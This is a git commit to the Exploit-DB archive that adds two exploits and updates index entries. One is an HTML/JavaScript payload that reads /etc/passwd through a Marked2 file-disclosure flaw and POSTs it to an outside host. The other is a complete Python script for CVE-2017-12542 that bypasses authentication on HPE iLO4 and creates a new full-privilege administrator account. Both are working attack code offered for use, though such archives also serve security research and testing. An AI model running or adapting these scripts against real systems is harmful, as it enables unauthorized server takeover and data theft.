DB: 2018-02-09

2 changes to exploits/shellcodes

Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow
Abuse-SDL 0.7 - Command Line Argument Buffer Overflow

MuPDF 1.3 - Stack Buffer Overflow in xps_parse_color()
MuPDF 1.3 - 'xps_parse_color()' Stack Buffer Overflow

Marked2 - Local File Disclosure

HPE iLO4 < 2.53 - Add New Administrator User
This commit is contained in:
Offensive Security 2018-02-09 05:01:51 +00:00
parent 2c4b08963a
commit 79b9c08b88
3 changed files with 138 additions and 2 deletions

View file

@ -0,0 +1,20 @@
<body>
<script>
var file = "file:///etc/passwd";
var extract = "http://dev.example.com:1337/";
function get(url) {
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", url, false);
xmlHttp.send(null);
return xmlHttp.responseText;
}
function steal(data) {
var xhr = new XMLHttpRequest();
xhr.open('POST', extract, true);
xhr.onload = function() {};
xhr.send(data);
}
var cdl = get(file);
steal(cdl);
</script>
</body>

114
exploits/multiple/remote/44005.py Executable file
View file

@ -0,0 +1,114 @@
#!/usr/bin/env python
"""
Exploit trigger was presented @reconbrx 2018
Vulnerability found and documented by synacktiv:
https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html
Original advisory from HP:
https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us
Other advisories for this CVE:
https://tools.cisco.com/security/center/viewAlert.x?alertId=54930
https://securitytracker.com/id/1039222
IMPORTANT:
THIS EXPLOIT IS JUST FOR ONE OUT OF THE THREE VULNERABILITES COVERED BY CVE-2017-12542!!!
The two other vulns are critical as well, but only triggerable on the host itself.
"""
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import json
import urllib3
#all of the HP iLO interfaces run on HTTPS, but most of them are using self-signed SSL cert
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
exploit_trigger = {'Connection' : 'A'*29}
accounts_url = 'https://%s/rest/v1/AccountService/Accounts'
def test(ip):
url = accounts_url % ip
try:
response = requests.get(url, headers = exploit_trigger, verify = False)
except Exception as e:
return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))
try:
data = json.loads(response.text)
except Exception as e:
return False, 'Target response not as exected!, Exception data: %s' % (str(e),)
return True, data
def exploit(ip, username, password):
Oem = {
'Hp' : {
'LoginName' : username,
'Privileges': {
'LoginPriv' : True,
'RemoteConsolePriv': True,
'UserConfigPriv' : True,
'VirtualMediaPriv': True,
'iLOConfigPriv':True,
'VirtualPowerAndResetPriv':True,
}
}
}
body = {
'UserName':username,
'Password':password,
'Oem':Oem
}
url = accounts_url % ip
try:
response = requests.post(url, json=body, headers = exploit_trigger, verify = False)
except Exception as e:
return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))
if response.status_code in [requests.codes.ok, requests.codes.created]:
return True, response.text
else:
return False, 'Server returned status code %d, data: %s' % (response.status_code, response.text)
if __name__ == '__main__':
import argparse
import sys
parser = argparse.ArgumentParser(description='CVE-2017-12542 Tester and Exploiter script.')
parser.add_argument('ip', help='target IP')
parser.add_argument('-t', action='store_true', default=True, help='Test. Trigger the exploit and list all users')
parser.add_argument('-e', action='store_true', default=False, help='Exploit. Create a new admin user with the credentials specified in -u and -p')
parser.add_argument('-u', help='username of the new admin user')
parser.add_argument('-p', help='password of the new admin user')
args = parser.parse_args()
if args.e:
if args.u is None or args.p is None:
print('Username and password must be set for exploiting!')
sys.exit()
res, data = exploit(args.ip, args.u, args.p)
if res:
print('[+] Sucsessfully added user!')
else:
print('[-] Error! %s' % data)
elif args.t:
res, data = test(args.ip)
if res:
print('[+] Target is VULNERABLE!')
for i in data['Items']:
print('[+] Account name: %s Username: %s' % (i['Name'], i['Oem']['Hp']['LoginName']))
else:
print('[-] Error! %s' % data)

View file

@ -8257,7 +8257,7 @@ id,file,description,date,author,type,platform,port
22779,exploits/windows/local/22779.pl,"Mailtraq 2.1.0.1302 - User Password Encoding",2003-06-16,"Noam Rathaus",local,windows,
22781,exploits/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module 'getlogin() Username' Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",local,linux,
22806,exploits/linux/local/22806.sh,"SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation",2003-06-19,V9,local,linux,
22811,exploits/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,local,bsd,
22811,exploits/bsd/local/22811.c,"Abuse-SDL 0.7 - Command Line Argument Buffer Overflow",2003-06-19,Matrix_DK,local,bsd,
22813,exploits/linux/local/22813.c,"Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Information Disclosure",2003-06-20,IhaQueR,local,linux,
22815,exploits/linux/local/22815.c,"GNU GNATS 3.113 - Environment Variable Buffer Overflow",2003-06-21,Xpl017Elz,local,linux,
40409,exploits/windows/local/40409.txt,"Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",local,windows,
@ -8652,7 +8652,7 @@ id,file,description,date,author,type,platform,port
30839,exploits/linux/local/30839.c,"Zabbix 1.1.4/1.4.2 - 'daemon_start' Local Privilege Escalation",2007-12-03,"Bas van Schaik",local,linux,
30999,exploits/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Local Privilege Escalation",2008-01-07,"Ruben Santamarta",local,windows,
31036,exploits/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",local,windows,
31090,exploits/windows/local/31090.txt,"MuPDF 1.3 - Stack Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",local,windows,
31090,exploits/windows/local/31090.txt,"MuPDF 1.3 - 'xps_parse_color()' Stack Buffer Overflow",2014-01-20,"Jean-Jamil Khalife",local,windows,
31151,exploits/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Buffer Overflow",2008-02-12,forensec,local,linux,
31182,exploits/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",local,windows,
31346,exploits/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)",2014-02-02,saelo,local,linux,
@ -9319,6 +9319,7 @@ id,file,description,date,author,type,platform,port
43973,exploits/windows/local/43973.c,"MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation",2018-02-05,"Souhail Hammou",local,windows,
43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Local Buffer Overflow",2018-02-05,"Juan Sacco",local,linux,
43987,exploits/windows/local/43987.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-07,"Souhail Hammou",local,windows,
44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -16005,6 +16006,7 @@ id,file,description,date,author,type,platform,port
44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,
44002,exploits/multiple/remote/44002.py,"Dahua Generation 2/3 - Backdoor Access",2017-05-02,bashis,remote,multiple,
44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
44005,exploits/multiple/remote/44005.py,"HPE iLO4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22

Can't render this file because it is too large.